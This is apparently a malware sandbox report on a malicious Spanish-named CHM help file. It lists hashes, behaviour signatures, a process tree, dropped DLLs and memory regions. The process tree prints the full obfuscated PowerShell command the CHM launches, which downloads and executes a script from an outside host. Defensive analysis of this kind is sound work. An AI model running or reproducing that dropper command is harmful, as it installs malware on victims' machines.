Overview

overview

10

Static

static

1

NOTA_DE_.chm

windows7-x64

10

NOTA_DE_.chm

windows10-2004-x64

10

Analysis

  • max time kernel
    29s
  • max time network
    35s
  • platform
    windows7_x64
  • resource
    win7-20230220-es
  • resource tags

    arch:x64arch:x86image:win7-20230220-eslocale:es-esos:windows7-x64systemwindows
  • submitted
    04-05-2023 18:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    NOTA_DE_.chm

  • Size

    17KB

  • MD5

    bb8f93b0d3d4705f5b392c86eb874026

  • SHA1

    a966e0c6a9089cb0d2109bcf3f0af6259a9b40e0

  • SHA256

    5a883d1a6f91650bdf834da1d2f95e7c02f1898dc4f9a4fed59c4b2c40b62f6d

  • SHA512

    89547138d769841ea014d5623bc007bfb668b1b4d140d9c087311484f0457aebd83cc340c2d2275d7388e1cff405f572ea886be62318b810b874d858a2ebb042

  • SSDEEP

    192:IGureT0FDCkUUKZB2FvC5bjlb/bbxR4imW4xBq34Pof:IGureT0FKUUB4alZbbbxRmNB3Pof

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://mailink.app/K72.txt

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Windows\hh.exe
    "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\NOTA_DE_.chm
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:596
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://mailink.app/K72.txt')|P
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1448
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        3⤵
          PID:2028
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          3⤵
            PID:1776
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            3⤵
              PID:1656
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
              3⤵
                PID:1244
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                3⤵
                  PID:1772

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\aef8bac5-5612-4e64-8c84-ab708c3a7b4d\AgileDotNetRT64.dll
              Filesize

              75KB

              MD5

              42b2c266e49a3acd346b91e3b0e638c0

              SHA1

              2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

              SHA256

              adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

              SHA512

              770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

              Download Submit

            • \Users\Admin\AppData\Local\Temp\7a258487-5a0c-4717-93fd-490530d5cdfb\AgileDotNetRT64.dll
              Filesize

              75KB

              MD5

              42b2c266e49a3acd346b91e3b0e638c0

              SHA1

              2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

              SHA256

              adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

              SHA512

              770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

              Download Submit

            • \Users\Admin\AppData\Local\Temp\aef8bac5-5612-4e64-8c84-ab708c3a7b4d\AgileDotNetRT64.dll
              Filesize

              75KB

              MD5

              42b2c266e49a3acd346b91e3b0e638c0

              SHA1

              2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

              SHA256

              adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

              SHA512

              770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

              Download Submit

            • memory/1448-116-0x000000001BBC0000-0x000000001BBE6000-memory.dmp

              Filesize

              152KB

              Download

            • memory/1448-86-0x0000000002950000-0x0000000002960000-memory.dmp

              Filesize

              64KB

              Download

            • memory/1448-82-0x0000000002220000-0x00000000022A0000-memory.dmp

              Filesize

              512KB

              Download

            • memory/1448-83-0x000000001B720000-0x000000001B766000-memory.dmp

              Filesize

              280KB

              Download

            • memory/1448-84-0x0000000002570000-0x000000000257A000-memory.dmp

              Filesize

              40KB

              Download

            • memory/1448-85-0x0000000002600000-0x0000000002608000-memory.dmp

              Filesize

              32KB

              Download

            • memory/1448-118-0x000000001BBC0000-0x000000001BBE6000-memory.dmp

              Filesize

              152KB

              Download

            • memory/1448-87-0x000000001BB70000-0x000000001BBA6000-memory.dmp

              Filesize

              216KB

              Download

            • memory/1448-88-0x0000000002220000-0x00000000022A0000-memory.dmp

              Filesize

              512KB

              Download

            • memory/1448-89-0x000000001BBC0000-0x000000001BBEC000-memory.dmp

              Filesize

              176KB

              Download

            • memory/1448-66-0x000000001B6D0000-0x000000001B71E000-memory.dmp

              Filesize

              312KB

              Download

            • memory/1448-65-0x0000000002360000-0x000000000236E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/1448-96-0x000007FEEFFA0000-0x000007FEF0124000-memory.dmp

              Filesize

              1.5MB

              Download

            • memory/1448-97-0x000000001BBC0000-0x000000001BBE6000-memory.dmp

              Filesize

              152KB

              Download

            • memory/1448-98-0x000000001BBC0000-0x000000001BBE6000-memory.dmp

              Filesize

              152KB

              Download

            • memory/1448-100-0x000000001BBC0000-0x000000001BBE6000-memory.dmp

              Filesize

              152KB

              Download

            • memory/1448-102-0x000000001BBC0000-0x000000001BBE6000-memory.dmp

              Filesize

              152KB

              Download

            • memory/1448-104-0x000000001BBC0000-0x000000001BBE6000-memory.dmp

              Filesize

              152KB

              Download

            • memory/1448-120-0x000000001BBC0000-0x000000001BBE6000-memory.dmp

              Filesize

              152KB

              Download

            • memory/1448-108-0x000000001BBC0000-0x000000001BBE6000-memory.dmp

              Filesize

              152KB

              Download

            • memory/1448-110-0x000000001BBC0000-0x000000001BBE6000-memory.dmp

              Filesize

              152KB

              Download

            • memory/1448-114-0x000000001BBC0000-0x000000001BBE6000-memory.dmp

              Filesize

              152KB

              Download

            • memory/1448-112-0x000000001BBC0000-0x000000001BBE6000-memory.dmp

              Filesize

              152KB

              Download

            • memory/1448-63-0x000000001B270000-0x000000001B552000-memory.dmp

              Filesize

              2.9MB

              Download

            • memory/1448-106-0x000000001BBC0000-0x000000001BBE6000-memory.dmp

              Filesize

              152KB

              Download

            • memory/1448-81-0x0000000002220000-0x00000000022A0000-memory.dmp

              Filesize

              512KB

              Download

            • memory/1448-174-0x000000001C7D0000-0x000000001C7E7000-memory.dmp

              Filesize

              92KB

              Download

            • memory/1448-122-0x000000001BBC0000-0x000000001BBE6000-memory.dmp

              Filesize

              152KB

              Download

            • memory/1448-126-0x000000001BBC0000-0x000000001BBE6000-memory.dmp

              Filesize

              152KB

              Download

            • memory/1448-130-0x000000001BBC0000-0x000000001BBE6000-memory.dmp

              Filesize

              152KB

              Download

            • memory/1448-128-0x000000001BBC0000-0x000000001BBE6000-memory.dmp

              Filesize

              152KB

              Download

            • memory/1448-132-0x000000001BBC0000-0x000000001BBE6000-memory.dmp

              Filesize

              152KB

              Download

            • memory/1448-134-0x000000001BBC0000-0x000000001BBE6000-memory.dmp

              Filesize

              152KB

              Download

            • memory/1448-136-0x000000001BBC0000-0x000000001BBE6000-memory.dmp

              Filesize

              152KB

              Download

            • memory/1448-137-0x000000001BE10000-0x000000001BE28000-memory.dmp

              Filesize

              96KB

              Download

            • memory/1448-138-0x000000001C7D0000-0x000000001C7EE000-memory.dmp

              Filesize

              120KB

              Download

            • memory/1448-64-0x0000000002340000-0x0000000002348000-memory.dmp

              Filesize

              32KB

              Download

            • memory/1448-151-0x000000001C7D0000-0x000000001C7E7000-memory.dmp

              Filesize

              92KB

              Download

            • memory/1448-152-0x000000001C7D0000-0x000000001C7E7000-memory.dmp

              Filesize

              92KB

              Download

            • memory/1448-154-0x000000001C7D0000-0x000000001C7E7000-memory.dmp

              Filesize

              92KB

              Download

            • memory/1448-156-0x000000001C7D0000-0x000000001C7E7000-memory.dmp

              Filesize

              92KB

              Download

            • memory/1448-160-0x0000000002220000-0x00000000022A0000-memory.dmp

              Filesize

              512KB

              Download

            • memory/1448-162-0x000000001C7D0000-0x000000001C7E7000-memory.dmp

              Filesize

              92KB

              Download

            • memory/1448-159-0x000000001C7D0000-0x000000001C7E7000-memory.dmp

              Filesize

              92KB

              Download

            • memory/1448-157-0x0000000002220000-0x00000000022A0000-memory.dmp

              Filesize

              512KB

              Download

            • memory/1448-166-0x000000001C7D0000-0x000000001C7E7000-memory.dmp

              Filesize

              92KB

              Download

            • memory/1448-164-0x000000001C7D0000-0x000000001C7E7000-memory.dmp

              Filesize

              92KB

              Download

            • memory/1448-170-0x000000001C7D0000-0x000000001C7E7000-memory.dmp

              Filesize

              92KB

              Download

            • memory/1448-168-0x000000001C7D0000-0x000000001C7E7000-memory.dmp

              Filesize

              92KB

              Download

            • memory/1448-124-0x000000001BBC0000-0x000000001BBE6000-memory.dmp

              Filesize

              152KB

              Download

            • memory/1448-172-0x000000001C7D0000-0x000000001C7E7000-memory.dmp

              Filesize

              92KB

              Download